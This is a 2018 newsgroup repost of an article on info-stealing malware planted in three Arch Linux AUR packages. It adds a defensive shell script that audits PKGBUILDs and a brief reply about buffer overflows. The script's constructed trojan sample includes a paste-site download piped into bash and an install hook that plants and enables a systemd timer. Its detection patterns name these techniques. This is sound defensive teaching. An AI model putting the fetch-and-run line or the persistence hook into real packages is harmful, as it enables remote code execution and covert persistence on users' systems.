Subject: Malware Found in Arch Linux AUR Package Repository
From: Anonymous
Newsgroups: rocksolid.shared.linux
Organization: RetroBBS II
Date: Thu, 12 Jul 2018 10:03 UTC
Message-ID: <pi790q$dqe$1@novabbs.com>
By Catalin Cimpanu
July 10, 2018 05:26 PM

Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages.

The malicious code has been removed thanks to the quick intervention of the AUR team.
Info-stealer found in "acroread" Arch Linux package

The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors.

On Saturday, a user going by the pseudonym of "xeactor" took over one such orphaned package named "acroread" that allows Arch Linux users to view PDF files.

According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb.pw, a lightweight site mimicking Pastebin that allows users to share small pieces of text.

When a user installed the package, the user's PC would download and execute the ~x file [VirusTotal, source code], which would later download and run another file named "~u" [VirusTotal, source code].

Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd and add a timer to run the ~u file every 360 seconds.
Malware didn't do much

The purpose of the second file (~u) was to collect data about each infected system and post these details inside a new Pastebin file, using the attacker's custom Pastebin API key.

Collected data includes details such as the date and time, machine's ID, CPU information, Pacman (package manager) details, and the outputs of the "uname -a" and "systemctl list-units" commands.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

There isn't a self-update mechanism included, meaning xeactor would have needed a second acroread package update to deploy more intrusive code, or potentially another malware strain.
Two other yet-to-be-named packages also found infected

The AUR team also said it found similar code in two other packages that the xeactor user had recently taken over. The following packages and versions were known to be affected:
acroread 9.5.5-8
balz 1.20-3
minergate 8.1-2

All malicious changes to all three packages have now been reversed, and xeactor's account has been suspended. The AUR repository should not be confused with official packages in the Arch Build System (ABS). AUR packages are user generated and submitted to the repository, while ABS packages are official packages from trusted sources. The Arch Linux team has warned users for years about verifying each AUR package before installing it.

Arch Linux is the second Linux distro that has found malware in its user-submitted package repository this year. In May, the Ubuntu Store team found a cryptocurrency miner hidden in an Ubuntu package named 2048buntu.
Posted on RetroBBS II
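The article's advice is to verify each AUR package before installing it. The script below is an added example, not code from the article, from BleepingComputer or from the AUR project: a small POSIX sh pre-install audit that greps a PKGBUILD and its optional .install file for the behaviours the article attributes to the acroread incident (a download from a paste site during the build, the downloaded file fed to a shell, a systemd timer written into the live system) plus one related red flag (checksums disabled with SKIP). Both sample packages are constructed inline; the ptpb.pw host is the one named in the article, while the "~x" URL path, the other paste hosts and every package name, file name and digest are assumptions.

```shell
#!/bin/sh
# Added example (not from the article or the AUR project): grep-based audit of
# an AUR package for the acroread-incident pattern. Run it on the cloned
# package directory before makepkg, after reading the git log of the package.

# Hosts treated as "paste sites". ptpb.pw is from the article; the rest are
# assumed additions.
PASTE_HOSTS='ptpb\.pw|pastebin\.com|hastebin\.com|transfer\.sh'

# audit_pkgbuild FILE...: print the matching lines and one "FLAG:" line per
# rule that fired; return 0 when nothing was flagged, 1 otherwise.
audit_pkgbuild() {
    bad=0
    for f in "$@"; do
        # Rule 1: curl/wget inside build logic. Honest downloads belong in
        # source=() so makepkg fetches them and checks the *sums=() arrays.
        if grep -nE '(^|[^[:alnum:]_])(curl|wget)[[:space:]]' "$f"; then
            echo "FLAG: network fetch outside source=() in $f"; bad=1
        fi
        # Rule 2: a paste-site host anywhere in the file.
        if grep -nE "$PASTE_HOSTS" "$f"; then
            echo "FLAG: paste-site URL in $f"; bad=1
        fi
        # Rule 3: data piped straight into a shell ("| bash", "| sh").
        if grep -nE '[|][[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$f"; then
            echo "FLAG: data piped into a shell in $f"; bad=1
        fi
        # Rule 4: systemd units touched outside $pkgdir, or systemctl invoked.
        # Packages may ship units under "$pkgdir"/usr/lib/systemd; they must
        # never write to the running system or enable anything at build time.
        if grep -nE 'systemd/system|systemctl' "$f" | grep -v pkgdir; then
            echo "FLAG: live systemd modification in $f"; bad=1
        fi
        # Rule 5: integrity checks disabled. Normal for some VCS packages,
        # suspicious on a package that downloads a release binary.
        if grep -nE "^[[:space:]]*(md5|sha[0-9]+|b2)sums=.*'SKIP'" "$f"; then
            echo "FLAG: checksum verification skipped in $f"; bad=1
        fi
    done
    return $bad
}

# --- constructed samples (not real AUR content) ---------------------------
tmpd=$(mktemp -d)
mkdir -p "$tmpd/hello" "$tmpd/acroread"

# Clean package: everything it fetches is listed in source=() with a digest
# (placeholder digest, constructed sample).
cat > "$tmpd/hello/PKGBUILD" <<'PKG'
pkgname=hello
pkgver=2.12
pkgrel=1
source=("https://example.invalid/hello-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() { cd "hello-$pkgver"; ./configure --prefix=/usr; make; }
package() { cd "hello-$pkgver"; make DESTDIR="$pkgdir" install; }
PKG

# Trojanized package modelled on the article: a paste-site download piped
# into bash from package(), and checksums switched off. Path "~x" assumed.
cat > "$tmpd/acroread/PKGBUILD" <<'PKG'
pkgname=acroread
pkgver=9.5.5
pkgrel=8
source=("https://example.invalid/acroread-$pkgver.bin")
sha256sums=('SKIP')
package() {
    install -Dm755 "$srcdir/acroread-$pkgver.bin" "$pkgdir/opt/acroread/bin/acroread"
    # shape of the injected line (constructed; URL path assumed)
    curl -s https://ptpb.pw/~x | bash -
}
PKG

# Companion .install hook that plants a 360-second timer in the live system,
# the persistence step the article describes (constructed).
cat > "$tmpd/acroread/acroread.install" <<'PKG'
post_install() {
    cat > /etc/systemd/system/u.timer <<'UNIT'
[Timer]
OnUnitActiveSec=360
UNIT
    systemctl enable --now u.timer
}
PKG

echo "== hello =="
audit_pkgbuild "$tmpd/hello/PKGBUILD" && echo "clean"
echo "== acroread =="
audit_pkgbuild "$tmpd/acroread/PKGBUILD" "$tmpd/acroread/acroread.install" || echo "REVIEW BEFORE makepkg"
```

On a real package the call is `audit_pkgbuild pkgdir/PKGBUILD pkgdir/*.install` after `git clone https://aur.archlinux.org/<pkg>.git`, ideally together with `git log -p` on that clone to see what changed when the maintainer changed. The rules are deliberately coarse: a hit is a reason to read the file, not proof of malice, and a PKGBUILD that passes can still do anything at install time, which is exactly the article's point about trusting AUR content.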


Subject: Re: Malware Found in Arch Linux AUR Package Repository
From: anon
Newsgroups: rocksolid.shared.linux
Organization: def4
Date: Thu, 12 Jul 2018 11:18 UTC
Message-ID: <6ea70f02e2ad501311c5a24f9bafed55@def4.com>
In-Reply-To: <pi790q$dqe$1@novabbs.com>
> The Arch Linux team is the second Linux distro that has found
> malware on its user-submitted package repository this year. In
> May, the Ubuntu Store team found a cryptocurrency miner hidden
> in an Ubuntu package named 2048buntu.

and that is only the obvious stuff...a carefully constructed buffer overflow would be much more difficult to spot, and finally could be used for the same purpose...

Posted on def4.i2p
